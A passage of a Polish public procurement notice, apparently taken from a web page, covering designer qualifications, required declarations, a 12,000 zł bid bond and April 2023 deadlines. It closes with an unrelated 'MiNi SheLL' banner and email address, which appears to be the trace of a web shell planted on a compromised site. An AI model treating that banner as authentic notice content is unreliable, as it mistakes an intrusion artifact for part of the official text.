instalację SKD (system kontroli dostępu),<br/> systemy sygnalizacji alarmu i pożaru,<br/> systemy telewizji przemysłowej,<br/> systemy audiowizualne,<br/> systemy zasilania dedykowanego i gwarantowanego,<br/> sieci bezprzewodowych;<br/><br/>• Projektant branży sanitarnej (co najmniej 1 osoba), posiadająca co najmniej: 5 letnie doświadczenie oraz uprawnienia budowlane* w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania bez ograniczeń, który wykonał:<br/> co najmniej 1 usługę opracowania dokumentacji projektowej obiektu w standardzie budynku pasywnego o powierzchni min. 1 500 m2 w okresie ostatnich 3 lat przed upływem terminu składania ofert.<br/> co najmniej 1 usługę opracowania dokumentacji projektowej obiektu dla którego źródło ciepła do celów ogrzewania/chłodzenia było oparte na odnawialnych źródłach energii w postaci gruntowej pompy ciepła, a moc zaprojektowanych urządzeń wynosiła min. 100 kW.<br/> co najmniej 1 usługę opracowania dokumentacji projektowej obiektu którego bilans energetyczny zapotrzebowania na energię wytworzoną do wykorzystanej jest równy 0-EP=0,0 kWh/m2 *rok (ilość wyprodukowanej energii elektrycznej = zapotrzebowania energii zużytej do celów ogrzewania/cwu/chłodzenia/oświetlenia) o powierzchni min. 2 500 m2 w okresie ostatnich 3 lat przed upływem terminu składania ofert.<br/>• Osobą, która posiada ubezpieczenie OC do sporządzania świadectw energetycznych i jest wpisana do „Wykazu osób uprawnionych do sporządzania świadectw charakterystyki energetycznej”<br/><br/>Poprzez pracę projektową o podobnym charakterze należy rozumieć usługę wykonania wielobranżowego projektu budowy, przebudowy lub rozbudowy obiektu o powierzchni użytkowej przynajmniej 2 000 m2, której wartość wyniosła minimum 150 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 Pzp w zakresie odnoszącym się do podstaw<br/>wykluczenia wskazanych w art. 108 ust. 1 pkt 1-6 Pzp oraz w art. 109 ust. 1 pkt 4 wzór oświadczenia stanowi Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- Wykaz usług wykonywanych lub wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, (wg. odpowiedniego warunku udziału w postępowaniu) oraz załączeniem dowodów określających czy zostały wykonane lub są wykonywane należycie<br/>przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot ma rzecz którego dostawy były wykonywane a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy<br/>wzór stanowi Załącznik nr 6 do SWZ.<br/>- Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami<br/>Załącznik nr 8 do SWZ<br/>dokumenty potwierdzające , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem na sumy gwarancyjnej tego ubezpieczenia</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów, a także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postę-powaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przed upływem terminu składania ofert, Wykonawca zobowiązany jest wnieść wadium w wysokości: 12 000,00 zł (słownie: dwanaście tysięcy złotych 00/100),<br/>2. Wadium może być wniesione w:<br/>2.1 pieniądzu;<br/>2.2 gwarancjach bankowych;<br/>2.3 gwarancjach ubezpieczeniowych;<br/>2.4 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz.<br/>299, ze zm.).<br/>3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego o<br/>numerze 87 1240 1268 1111 0010 9615 6187<br/>4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na<br/>rachunku bankowym Zamawiającego, o którym mowa w pkt 3, przed upływem terminu składania<br/>ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>5. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie pieniężnej, dokument<br/>potwierdzający dokonanie przelewu wadium został załączony do oferty.<br/>6. Wadium w formie gwarancji lub poręczenia należy wnieść jako osobny plik (w sposób pozwalający na jego zwrot bez dekompletowania oferty) obok innych plików stanowiących ofertę z<br/>uwzględnieniem pkt. 7.<br/>7. Z treści gwarancji / poręczenia powinno wynikać:<br/>7.1 nazwa zleceniodawcy (Wykonawcy), beneficjenta gwarancji / poręczenia (Zamawiającego),<br/>gwaranta / poręczyciela (podmiotu udzielającego gwarancji / poręczenia) oraz adresy ich siedzib,<br/>7.2 określenie wierzytelności, która ma być zabezpieczona gwarancją / poręczeniem,<br/>7.3 kwota gwarancji / poręczenia,<br/>7.4 termin ważności gwarancji/poręczenia, obejmujący cały okres związania ofertą, począwszy od<br/>dnia wyznaczonego na dzień składania ofert,<br/>7.5 bezwarunkowe, nieodwoływalne oraz płatne na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta / Poręczyciela do wypłaty<br/>Zamawiającemu, maksymalnie w terminie 30 dni od dnia żądania, pełnej kwoty wadium<br/>w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp,<br/>8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona.<br/>9. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet<br/>zabezpieczenia należytego wykonania umowy określa ustawa Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo osoby reprezentującej<br/>wspólnie działających wykonawców, określające postępowanie do którego się odnosi, precyzujące zakres umocowania oraz<br/>określające osobę pełnomocnika i wykonawców udzielających pełnomocnictwa. Pełnomocnictwo powinno być podpisane<br/>przez wszystkich wykonawców..W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>niepodleganiu wykluczeniu z postępowania - wzór zawarty jest w załączniku nr 3a do SWZ składa każdy z wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z zapisami SWZ w tym wzorem umowy załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest złożyć ofertę według wzoru stanowiącego załącznik nr 1 do SWZ oraz załączyć do oferty<br/>aktualne nadzień składania ofert następujące oświadczenia i dokumenty:<br/>1.1. formularz cenowy – wzór zawarty jest w załączniku nr 2 do SWZ.<br/>1.2 Oświadczenie o niepodleganiu wykluczeniu z postępowania - wzór zawarty jest w załączniku nr 3a do SWZ.<br/>1.3 Oświadczenie o spełnianiu warunków udziału w postępowaniu- wzór zawarty jest w załączniku nr 3b do SWZ. <br/>1.4. W przypadku realizacji zamówienia przy udziale podwykonawców należy złożyć oświadczenie wskazujące<br/>podwykonawcę i część zamówienia, która będzie przez niego realizowana.<br/>1.5. W przypadku gdy w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dokumentów tj. KRS-u, CEiIoDG, innego rejestru, Wykonawca zobowiązany jest do złożenia pełnomocnictwa lub innego<br/>dokumentu potwierdzającego umocowanie do reprezentowania<br/>1.6 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo osoby reprezentującej<br/>wspólnie działających wykonawców, określające postępowanie do którego się odnosi, precyzujące zakres umocowania oraz określające osobę pełnomocnika i wykonawców udzielających pełnomocnictwa. Pełnomocnictwo powinno być podpisane przez wszystkich wykonawców.<br/>1.7 Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów (wzór załącznik nr7) , a także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby (wzór zawarty jest w załączniku nr 3a i b do SWZ)

Creat By MiNi SheLL
Email: jattceo@gmail.com